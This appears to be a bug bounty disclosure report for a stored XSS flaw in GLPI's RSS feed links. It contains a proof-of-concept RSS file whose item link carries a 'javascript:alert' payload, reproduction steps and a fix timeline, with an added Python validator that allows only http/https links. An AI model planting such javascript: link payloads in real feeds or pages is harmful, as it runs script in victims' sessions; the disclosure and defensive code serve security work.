Stored XSS - XSS in RSS link in glpi-project/glpi

Valid

Reported on

Oct 27th 2022


Description

An Administrator can import a malicious RSS feed whose item links contain Cross Site Scripting (XSS) payloads. The administrator can then make the RSS feed available to all users of the software. Any victim who clicks the link of an RSS item will execute the JavaScript code in a new tab.

Proof of Concept

1. Create a malicious RSS feed

The XSS payload is placed inside the <link> element of an item, with the value:

<link>javascript:alert(`XSS in RSS link !`)</link>

Content of xss.rss :

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
        <channel>
                <title>toto</title>
                <description>This is a simplified example of the RSS feed</description>
                <link>https://blog.fileformat.com/</link>
                <copyright>2021 fileformat.com All rights reserved</copyright>
                <lastBuildDate>Wed, 22 Jun 2021 00:01:00 +0000</lastBuildDate>
                <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                <ttl>1800</ttl>
                <item>
                        <title>Example entry</title>
                        <description>Here is some text containing an interesting description.</description>
                        <link>javascript:alert(`XSS in RSS link !`)</link>
                        <guid isPermaLink="false">9bd605d5-1921-8i67-dgft-65g635d3587u</guid>
                        <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate>
                </item>
        </channel>
</rss>
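As an added example (not GLPI code, and not part of the original report), the following Python validator shows the defensive check the bug calls for: before an item link is rendered as a clickable href, parse the feed and keep only links whose scheme is http or https. It uses a constructed feed modelled on the PoC above, extended with a mixed-case, whitespace-padded variant and a relative link, since a naive prefix check such as `startswith("javascript:")` misses both of those. All function and constant names are hypothetical.

```python
"""Validate RSS item links before rendering them as clickable hrefs.

Added example, not GLPI code. Parses a feed and keeps only links whose
scheme is http or https, so a javascript: link like the one in the PoC is
dropped instead of becoming an <a href> that runs script on click.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample feed modelled on the PoC: one benign item, one item
# whose <link> carries a javascript: URL, one using mixed case and leading
# whitespace (browsers normalise both before scheme detection), and one
# relative link.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
  <channel>
    <title>toto</title>
    <link>https://blog.fileformat.com/</link>
    <item>
      <title>Benign entry</title>
      <link>https://blog.fileformat.com/post/1</link>
    </item>
    <item>
      <title>Malicious entry</title>
      <link>javascript:alert(`XSS in RSS link !`)</link>
    </item>
    <item>
      <title>Obfuscated entry</title>
      <link>  JavaScript:alert(1)</link>
    </item>
    <item>
      <title>Relative entry</title>
      <link>/relative/path</link>
    </item>
  </channel>
</rss>"""


def safe_link(raw):
    """Return the link if its scheme is http/https, else None.

    Tab, CR and LF are removed anywhere in the value (browsers strip them
    before scheme detection), surrounding whitespace is trimmed, and the
    scheme is compared case-insensitively, so 'JavaScript:' and
    ' javascript:' are both rejected. A scheme-less (relative) link is
    rejected too, because it would resolve against the viewing
    application's origin rather than the feed's.
    """
    if raw is None:
        return None
    cleaned = "".join(ch for ch in raw if ch not in "\t\r\n").strip()
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned


def extract_items(feed_xml):
    """Parse an RSS 2.0 document and return a (title, safe_link) tuple per item.

    Items whose link fails validation get None so the caller can render the
    title as plain text rather than as a clickable link.
    """
    data = feed_xml.encode("utf-8") if isinstance(feed_xml, str) else feed_xml
    root = ET.fromstring(data)
    items = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        link = safe_link(item.findtext("link"))
        items.append((title, link))
    return items


if __name__ == "__main__":
    for title, link in extract_items(SAMPLE_FEED):
        print(f"{title!r}: {link or '(link rejected)'}")
```

The allow-list approach (accept only http/https) is deliberate: a deny-list of dangerous schemes would also have to cover data:, vbscript: and any future ones, and it would still miss the relative-link case. When the feed comes from an untrusted source, parse it with a hardened parser such as defusedxml rather than the standard ElementTree, so that entity-expansion attacks are rejected before link validation even runs.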

2. Add RSS feed

3. Change the visibility of the RSS feed to public

4. Observer account can view the XSS

5. XSS is executed

6. Other accounts like Self-service can also view and execute the XSS

Impact

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, or modifying presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information resulting in an overdose. Source OWASP - Cross Site Scripting (XSS).

References

We are processing your report and will contact the glpi-project/glpi team within 24 hours. a month ago
xanhacks modified the report
a month ago
We have contacted a member of the glpi-project/glpi team and are waiting to hear back a month ago
We have sent a follow up to the glpi-project/glpi team. We will try again in 7 days. a month ago
glpi-project/glpi maintainer has acknowledged this report a month ago
Cédric Anne validated this vulnerability a month ago
xanhacks has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Cédric Anne marked this as fixed in 10.0.4 with commit 071c4e a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Cédric Anne published this vulnerability a month ago
RSSFeed.php#L1078 has been validated